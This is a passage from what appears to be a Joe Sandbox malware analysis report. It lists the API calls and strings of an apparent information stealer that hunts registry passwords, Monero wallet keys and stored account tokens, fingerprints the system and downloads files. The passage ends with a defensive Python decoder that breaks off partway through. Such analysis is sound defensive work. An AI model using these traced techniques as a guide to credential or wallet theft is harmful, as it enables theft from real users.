                               • Associated: 00000000.00000002.2205335514.00000000012EA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2205335514.00000000012F9000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2205666867.00000000012FA000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2205787567.00000000014A8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2205806938.00000000014A9000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                              • String ID: :
                              • API String ID: 2677904052-3653984579
                              • Opcode ID: e8681721fe8043956a62b7ecc9f1da4a7b8983f571557acfb508209ff12ff536
                              • Instruction ID: 8832eefe7296b19e313e7f0714ce9a3b71c90e5d6bcb827873d08b392c08a861
                              • Opcode Fuzzy Hash: e8681721fe8043956a62b7ecc9f1da4a7b8983f571557acfb508209ff12ff536
                              • Instruction Fuzzy Hash: CA314F75A00249DBCB68FFA5DC59DFE7378EB48301B204118F106A7284DE39A946DB70
                              APIs
                                • Part of subcall function 00DFA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00DFA7E6
                                • Part of subcall function 00DE47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00DE4839
                                • Part of subcall function 00DE47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00DE4849
                              • InternetOpenA.WININET(00E00DF7,00000001,00000000,00000000,00000000), ref: 00DE610F
                              • StrCmpCA.SHLWAPI(?,0197F1D8), ref: 00DE6147
                              • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 00DE618F
                              • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00DE61B3
                              • InternetReadFile.WININET(?,?,00000400,?), ref: 00DE61DC
                              • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00DE620A
                              • CloseHandle.KERNEL32(?,?,00000400), ref: 00DE6249
                              • InternetCloseHandle.WININET(?), ref: 00DE6253
                              • InternetCloseHandle.WININET(00000000), ref: 00DE6260
                              Memory Dump Source
                              • Source File: 00000000.00000002.2203803568.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                               • Associated: 00000000.00000002.2203767107.0000000000DE0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2203803568.0000000000E91000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2203803568.0000000000E9D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2203803568.0000000000EC2000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2203803568.000000000102A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2205335514.000000000103E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2205335514.00000000011D5000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2205335514.00000000012BE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2205335514.00000000012E2000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2205335514.00000000012EA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2205335514.00000000012F9000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2205666867.00000000012FA000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2205787567.00000000014A8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2205806938.00000000014A9000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                              • String ID:
                              • API String ID: 2507841554-0
                              • Opcode ID: f468309548732481f990e7ce1d2de7c23cb9e552d6bb12c40f42c53d6e9d5c86
                              • Instruction ID: 4983c4b91fdbd00237fe5f8b9746e192f516ac4d5b51b42653c29ebcafed9f11
                              • Opcode Fuzzy Hash: f468309548732481f990e7ce1d2de7c23cb9e552d6bb12c40f42c53d6e9d5c86
                              • Instruction Fuzzy Hash: 89516EB1A00218EBDB20EF51DC45BEE77B8FB44745F108098E709A7184DB75AA85CFB9
                              APIs
                              • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00DE733A
                              • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00DE73B1
                              • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00DE740D
                              • GetProcessHeap.KERNEL32(00000000,?), ref: 00DE7452
                              • HeapFree.KERNEL32(00000000), ref: 00DE7459
                              • task.LIBCPMTD ref: 00DE7555
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2203803568.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                               • Associated: 00000000.00000002.2203767107.0000000000DE0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2203803568.0000000000E91000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2203803568.0000000000E9D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2203803568.0000000000EC2000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2203803568.000000000102A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2205335514.000000000103E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2205335514.00000000011D5000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2205335514.00000000012BE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2205335514.00000000012E2000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2205335514.00000000012EA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2205335514.00000000012F9000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2205666867.00000000012FA000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2205787567.00000000014A8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2205806938.00000000014A9000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$EnumFreeOpenProcessValuetask
                              • String ID: Password
                              • API String ID: 775622407-3434357891
                              • Opcode ID: ba2a972815c4c60bb5c4c829680688c0c10687efd49944229eaf356e8dda9adb
                              • Instruction ID: 5d61987f21070368134c4e0ccd51b8ec5afc415edf1f60a8b275e2c1826a0e0d
                              • Opcode Fuzzy Hash: ba2a972815c4c60bb5c4c829680688c0c10687efd49944229eaf356e8dda9adb
                              • Instruction Fuzzy Hash: 29611AB59042989BDB24EB51DC51BD9B7B8FF44300F0481E9E689A6181EBB05FC9CFB0
                              APIs
                                • Part of subcall function 00DFA740: lstrcpy.KERNEL32(00E00E17,00000000), ref: 00DFA788
                                • Part of subcall function 00DFA9B0: lstrlen.KERNEL32(?,019786B0,?,\Monero\wallet.keys,00E00E17), ref: 00DFA9C5
                                • Part of subcall function 00DFA9B0: lstrcpy.KERNEL32(00000000), ref: 00DFAA04
                                • Part of subcall function 00DFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00DFAA12
                                • Part of subcall function 00DFA920: lstrcpy.KERNEL32(00000000,?), ref: 00DFA972
                                • Part of subcall function 00DFA920: lstrcat.KERNEL32(00000000), ref: 00DFA982
                                • Part of subcall function 00DFA8A0: lstrcpy.KERNEL32(?,00E00E17), ref: 00DFA905
                                • Part of subcall function 00DFA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00DFA7E6
                              • lstrlen.KERNEL32(00000000), ref: 00DEBC9F
                                • Part of subcall function 00DF8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00DF8E52
                              • StrStrA.SHLWAPI(00000000,AccountId), ref: 00DEBCCD
                              • lstrlen.KERNEL32(00000000), ref: 00DEBDA5
                              • lstrlen.KERNEL32(00000000), ref: 00DEBDB9
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2203803568.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                               • Associated: 00000000.00000002.2203767107.0000000000DE0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2203803568.0000000000E91000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2203803568.0000000000E9D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2203803568.0000000000EC2000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2203803568.000000000102A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2205335514.000000000103E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2205335514.00000000011D5000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2205335514.00000000012BE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2205335514.00000000012E2000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2205335514.00000000012EA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2205335514.00000000012F9000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2205666867.00000000012FA000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2205787567.00000000014A8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2205806938.00000000014A9000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                              • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                              • API String ID: 3073930149-1079375795
                              • Opcode ID: 36582db688aa63c8c43e44538ac26c50a25dd4fe03c2142522e3f9cf8000f6e8
                              • Instruction ID: 466480349c74b5feda3ff6c6356eb341d0cae080d06d67f7c5b28c302d22f1b5
                              • Opcode Fuzzy Hash: 36582db688aa63c8c43e44538ac26c50a25dd4fe03c2142522e3f9cf8000f6e8
                              • Instruction Fuzzy Hash: 93B15FB191011C9BCB14FBA4CC96EFE7338EF54300F558169F60AA6095EF746A49CB72
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2203803568.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                               • Associated: 00000000.00000002.2203767107.0000000000DE0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2203803568.0000000000E91000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2203803568.0000000000E9D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2203803568.0000000000EC2000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2203803568.000000000102A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2205335514.000000000103E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2205335514.00000000011D5000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2205335514.00000000012BE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2205335514.00000000012E2000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2205335514.00000000012EA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2205335514.00000000012F9000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2205666867.00000000012FA000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2205787567.00000000014A8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2205806938.00000000014A9000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExitProcess$DefaultLangUser
                              • String ID: *
                              • API String ID: 1494266314-163128923
                              • Opcode ID: 924886a04af39a3cc68d80d4a27c4bab66a3552ca0599b1511b20bf76238bd3c
                              • Instruction ID: b81483b4ae803f9f8c695413070e5cf4afddae1606be2ced5e71c07000805122
                              • Opcode Fuzzy Hash: 924886a04af39a3cc68d80d4a27c4bab66a3552ca0599b1511b20bf76238bd3c
                              • Instruction Fuzzy Hash: DFF05430A04209EFD364AFE0E90972CBB70FB14707F244198E646C7F84DA7A4B41DBA9
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00DE4FCA
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00DE4FD1
                              • InternetOpenA.WININET(00E00DDF,00000000,00000000,00000000,00000000), ref: 00DE4FEA
                              • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00DE5011
                              • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00DE5041
                              • InternetCloseHandle.WININET(?), ref: 00DE50B9
                              • InternetCloseHandle.WININET(?), ref: 00DE50C6
                              Memory Dump Source
                              • Source File: 00000000.00000002.2203803568.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                               • Associated: 00000000.00000002.2203767107.0000000000DE0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2203803568.0000000000E91000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2203803568.0000000000E9D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2203803568.0000000000EC2000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2203803568.000000000102A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2205335514.000000000103E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2205335514.00000000011D5000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2205335514.00000000012BE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2205335514.00000000012E2000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2205335514.00000000012EA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2205335514.00000000012F9000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2205666867.00000000012FA000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2205787567.00000000014A8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2205806938.00000000014A9000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                              • String ID:
                              • API String ID: 3066467675-0
                              • Opcode ID: 3cc2271e0d8dd89e2287b290bd204a84c49487419a833316f23835aec1874764
                              • Instruction ID: 8b7e80bcdc73c6cb8feae758fdb7c7c922b85f909697f93ffce193ed4c4a9b3f
                              • Opcode Fuzzy Hash: 3cc2271e0d8dd89e2287b290bd204a84c49487419a833316f23835aec1874764
                              • Instruction Fuzzy Hash: A631F7B4A00218EBDB20DF54DC85BD8B7B4FB48704F5081D9F609A7285CB756A858FA8
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,0197EC20,00000000,?,00E00E2C,00000000,?,00000000), ref: 00DF8130
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00DF8137
                              • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00DF8158
                              • wsprintfA.USER32 ref: 00DF81AC
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2203803568.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                               • Associated: 00000000.00000002.2203767107.0000000000DE0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2203803568.0000000000E91000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2203803568.0000000000E9D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2203803568.0000000000EC2000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2203803568.000000000102A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2205335514.000000000103E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2205335514.00000000011D5000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2205335514.00000000012BE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2205335514.00000000012E2000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2205335514.00000000012EA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2205335514.00000000012F9000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2205666867.00000000012FA000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2205787567.00000000014A8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2205806938.00000000014A9000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateGlobalMemoryProcessStatuswsprintf
                              • String ID: %d MB$@
                              • API String ID: 2922868504-3474575989
                              • Opcode ID: b77fcbb1f89f971ab0b424497f427a73d7f3f1548662b68654ffdc6ecb477337
                              • Instruction ID: 7f8d9f0be049c980da77cb8076944dffc0a2677623dbcbeacf2dca0f6ce5b7d1
                              • Opcode Fuzzy Hash: b77fcbb1f89f971ab0b424497f427a73d7f3f1548662b68654ffdc6ecb477337
                              • Instruction Fuzzy Hash: B821F9B1E44218ABDB10DFD4CC49FAEB7B9EB44B10F208609F705BB284DB7959058BA5
                              APIs
                              • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00DF8426
                              • wsprintfA.USER32 ref: 00DF8459
                              • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 00DF847B
                              • RegCloseKey.ADVAPI32(00000000), ref: 00DF848C
                              • RegCloseKey.ADVAPI32(00000000), ref: 00DF8499
                                • Part of subcall function 00DFA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00DFA7E6
                              • RegQueryValueExA.ADVAPI32(00000000,0197EAD0,00000000,000F003F,?,00000400), ref: 00DF84EC
                              • lstrlen.KERNEL32(?), ref: 00DF8501
                              • RegQueryValueExA.ADVAPI32(00000000,0197EC50,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00E00B34), ref: 00DF8599
                              • RegCloseKey.ADVAPI32(00000000), ref: 00DF8608
                              • RegCloseKey.ADVAPI32(00000000), ref: 00DF861A
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2203803568.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                              • Associated: 00000000.00000002.2203767107.0000000000DE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000E9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000EC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000011D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205666867.00000000012FA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205787567.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205806938.00000000014A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                              • String ID: %s\%s
                              • API String ID: 3896182533-4073750446
                              • Opcode ID: 79f3e6a64ad31ca7adbdf91ac883718ae6a83753f634fbd715f7a3b2ad8fd640
                              • Instruction ID: 9a95b52d523c6463e0ecba1c03b3eed4da58b583dc31fff527696cd2b9e4f2c8
                              • Opcode Fuzzy Hash: 79f3e6a64ad31ca7adbdf91ac883718ae6a83753f634fbd715f7a3b2ad8fd640
                              • Instruction Fuzzy Hash: 2821F8B1A0022CABDB24DF54DC85FE9B3B8FB48700F10C598E649A6140DF756A85CFA4
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00DF76A4
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00DF76AB
                              • RegOpenKeyExA.ADVAPI32(80000002,0196B9A8,00000000,00020119,00000000), ref: 00DF76DD
                              • RegQueryValueExA.ADVAPI32(00000000,0197EBA8,00000000,00000000,?,000000FF), ref: 00DF76FE
                              • RegCloseKey.ADVAPI32(00000000), ref: 00DF7708
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2203803568.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                               • Associated: 00000000.00000002.2203767107.0000000000DE0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2203803568.0000000000E91000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2203803568.0000000000E9D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2203803568.0000000000EC2000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2203803568.000000000102A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2205335514.000000000103E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2205335514.00000000011D5000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2205335514.00000000012BE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2205335514.00000000012E2000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2205335514.00000000012EA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2205335514.00000000012F9000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2205666867.00000000012FA000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2205787567.00000000014A8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2205806938.00000000014A9000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID: Windows 11
                              • API String ID: 3225020163-2517555085
                              • Opcode ID: 08b1593b9e4dbb3d64552687d71c5fd4b5afbfae09fe65dd34e272f1fc9ffecd
                              • Instruction ID: 3b050dab3a5dd4ec0e9a34dacac8663191723e5988f8ddbd420573f6f31512cd
                              • Opcode Fuzzy Hash: 08b1593b9e4dbb3d64552687d71c5fd4b5afbfae09fe65dd34e272f1fc9ffecd
                              • Instruction Fuzzy Hash: AE0144B5B04209FBD720EFE4DC49FBA77B8EB44701F208454FB45D7584DAB599008B60
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00DF7734
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00DF773B
                              • RegOpenKeyExA.ADVAPI32(80000002,0196B9A8,00000000,00020119,00DF76B9), ref: 00DF775B
                              • RegQueryValueExA.ADVAPI32(00DF76B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 00DF777A
                              • RegCloseKey.ADVAPI32(00DF76B9), ref: 00DF7784
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2203803568.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                               • Associated: 00000000.00000002.2203767107.0000000000DE0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2203803568.0000000000E91000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2203803568.0000000000E9D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2203803568.0000000000EC2000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2203803568.000000000102A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2205335514.000000000103E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2205335514.00000000011D5000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2205335514.00000000012BE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2205335514.00000000012E2000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2205335514.00000000012EA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2205335514.00000000012F9000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2205666867.00000000012FA000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2205787567.00000000014A8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2205806938.00000000014A9000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID: CurrentBuildNumber
                              • API String ID: 3225020163-1022791448
                              • Opcode ID: b5029743c85a254cb23aeb82103525efad0d4342354887d0fcf8c541745bfd02
                              • Instruction ID: cad6b0de3a6ae4babb2dd58647a596255922eca599a1f25e7c66af966ef3a1bc
                              • Opcode Fuzzy Hash: b5029743c85a254cb23aeb82103525efad0d4342354887d0fcf8c541745bfd02
                              • Instruction Fuzzy Hash: 550144B5B40308FBDB20DFE0DC49FAEB7B8EB44701F108555FA45A7285DAB556008B61
                              APIs
                              • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00DE99EC
                              • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00DE9A11
                              • LocalAlloc.KERNEL32(00000040,?), ref: 00DE9A31
                              • ReadFile.KERNEL32(000000FF,?,00000000,00DE148F,00000000), ref: 00DE9A5A
                              • LocalFree.KERNEL32(00DE148F), ref: 00DE9A90
                              • CloseHandle.KERNEL32(000000FF), ref: 00DE9A9A
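                               The "APIs" listings in this report carry most of their meaning in raw hex arguments: 80000001 and 80000002 as the registry root handed to RegOpenKeyExA, 00020019 and 00020119 as its access mask, 04000100 as the InternetOpenUrlA flags, 0000001C as the CSIDL passed to SHGetFolderPathA, 00000040 for LocalAlloc, and 80000000 / 00000001 / 00000003 in the CreateFileA call above. The script below is an added example, not Joe Sandbox code and not derived from the sample: it parses lines in the listing format used on this page and names those constants from the Win32 SDK values. The sample listing is a constructed copy of lines that appear on this page; the function names (parse_api_line, annotate, render) and the constant tables are mine, and the tables cover only the APIs seen here plus their obvious neighbours.

```python
"""Decode the constants in Joe Sandbox "APIs" listing lines (added example)."""
import re
from dataclasses import dataclass, field
from typing import List, Optional, Union

# Constructed sample in the report's line format; values copied from this page.
SAMPLE = """\
• RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00DE733A
• StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00DE740D
• InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00DE5011
• CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00DE99EC
  • Part of subcall function 00DF8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00DF8E0B
• RegOpenKeyExA.ADVAPI32(80000002,0196B9A8,00000000,00020119,00000000), ref: 00DF76DD
  • Part of subcall function 00DF8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00DF8E52
• wsprintfA.USER32 ref: 00DF81AC
"""

# Subcall lines carry the caller address; some calls (wsprintfA) have no argument list.
_LINE = re.compile(
    r"^\s*(?:•\s*)?(?:Part of subcall function (?P<parent>[0-9A-F]{8}):\s*)?"
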